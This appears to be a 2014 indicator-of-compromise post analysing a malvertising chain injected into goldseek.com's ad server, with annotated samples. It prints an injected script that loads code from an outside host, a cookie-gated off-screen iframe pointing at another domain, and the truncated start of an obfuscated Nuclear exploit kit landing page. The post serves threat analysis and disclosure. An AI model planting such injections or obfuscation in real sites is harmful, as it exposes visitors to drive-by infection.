malwageddon

IOC - www.goldseek.com 2014-08-28

Aug 29th, 2014
  1. // These redirects started appearing around 2014-08-27
  2.  // Webpage at http://advertising.goldseek.com/www/delivery/spcjs.php?id=1&block=1&target=_top has injected JS at the very top of the page
  3.  
  4.  document.write('<script type="text/javascript" src="http://roberts.REDDOTCORP.CN/js/ads/show_ads.js?ver=4.15.8241"></script>'); // stage 1: injects a <script> tag that loads show_ads.js from a different host than the ad server; the ad-like path and ?ver= query look chosen to blend in with ad traffic (analyst inference)
  5.  
  6.  // The request for show_ads.js returns the following code
  7.  
  8.  if (document.cookie.indexOf("jessica") == -1) { // stage 2 gate: runs only when no cookie string containing "jessica" is present, i.e. on the first visit
  9.      document.write("<iframe style='left:-790px;top:-810px;position:absolute;width:45;height:35' src='http://michael.youdaretocare.org/c6c3e4aeytc.html'></iframe>"); // iframe is absolutely positioned at negative offsets, so it renders off-screen while still loading its src
  10.      document.cookie = "jessica=readed; max-age=28000; path=/"; // marker cookie lasting 28000 s (about 7.8 hours): a revisit from the same browser profile in that window gets no iframe, so reproduce with a clean profile
  11.  } else {} // empty else: nothing is written when the marker cookie already exists
  12.  
  13.  // The hidden iframe in turn loads the Nuclear EK landing page, shown below (truncated)
  14.  
  15.  <html>
  16.  
  17.  <body bgcolor="#33ff00">
  18.      <script>
  19.          var Eb1v = "OZOoZXZ"; // not referenced in the visible part of the sample; the random-looking var assignments between statements appear to be filler
  20.          eval('aRU ' + '= t' + 'hi' + 's' + ';'); // evaluates `aRU = this;` - at script top level this aliases the global object, which is how aRU["n4QVp"] resolves below
  21.          var cfX48pU = "zk7";
  22.          cPTN = "^%1sRqZwSUJp8=] ,{f#_o>Xi@\\!A$T462L-|9k0xH[hQVm\"DMny5jcrIE+:g/Ge';tF)<Wu?l&Y}C*a(7zPNKbdBO.3v"; // long character table; its use is not visible before the SNIP - presumably a decoding alphabet for the payload (unconfirmed)
  23.          var VQ6aO = "xGV";
  24.          eval('eGv =' + ' "re' + 'pl' + 'ac' + 'e";'); // evaluates `eGv = "replace";` - the method name is assembled from fragments so the literal never appears whole in the source
  25.          var j3eXay6 = "ictx";
  26.          eval('RvhnId' + ' = ' + '/U' + 'l' + 'uN/' + 'g;'); // evaluates `RvhnId = /UluN/g;` - regex for the "UluN" padding token; not used in the visible part
  27.          var slbUJp = "h8ua4rH";
  28.          n4QVp = function(ybIxto) { // string de-padding helper: returns its argument with every "UluN" occurrence removed
  29.              var D8gGeG = "w5dIS";
  30.              if (ybIxto == "") {
  31.                  var vZAzKcw = "cJn5uH";
  32.                  return ybIxto; // empty input is returned unchanged
  33.                  var GHv5oi = "Uracil"; // unreachable after the return
  34.              } else {
  35.                  var vubdCA = "SH6wezv";
  36.                  return ybIxto[eGv](/UluN/g, ""); // eGv holds "replace", so this is ybIxto.replace(/UluN/g, "")
  37.                  var ehQZDv = "jNsAlp"; // unreachable after the return
  38.              }
  39.              var GrwUF1R = "DSsCmTU"; // unreachable: both branches above return
  40.          };
  41.          var hSN = "AT5";
  42.          KjPl = [ // lookup table of names recovered by stripping the "UluN" padding with n4QVp (called through the aRU global alias)
  43.              [aRU["n4QVp"]("cUluNoUluNnUluNcUluNaUluNtUluN"), aRU["n4QVp"]("sUluNuUluNbUluNsUluNtUluNrUluN"), aRU["n4QVp"]("dUluNoUluNcUluNuUluNmUluNeUluNnUluNtUluN"), aRU["n4QVp"]("CUluNoUluNlUluNoUluNrUluN"), aRU["n4QVp"]("lUluNeUluNnUluNgUluNtUluNhUluN")], // decodes to "concat", "substr", "document", "Color", "length"
  44.              [aRU["n4QVp"]("eUluNvUluN#UluN3UluN3UluNfUluNfUluN0UluN0UluNaUluNlUluN"), aRU["n4QVp"]("wUluNiUluNnUluN#UluN3UluN3UluNfUluNfUluN0UluN0UluNdUluNoUluNwUluN"), aRU["n4QVp"]("rUluNeUluNpUluNlUluNaUluNcUluNeUluN")] // decodes to "ev#33ff00al", "win#33ff00dow", "replace"
  45.          ]; // "#33ff00" inside two entries equals the <body bgcolor> value; the snipped code presumably removes it to obtain "eval" and "window" (not visible here), which would tie decoding to the page's DOM
  46.          var ZVUB = "Ho23";
  47.          TkiWqo = function() {
  48.                  var j394;
  49.                  eval('QtqZr6' + '="' +
  50.  
  51.  <--- SNIP --->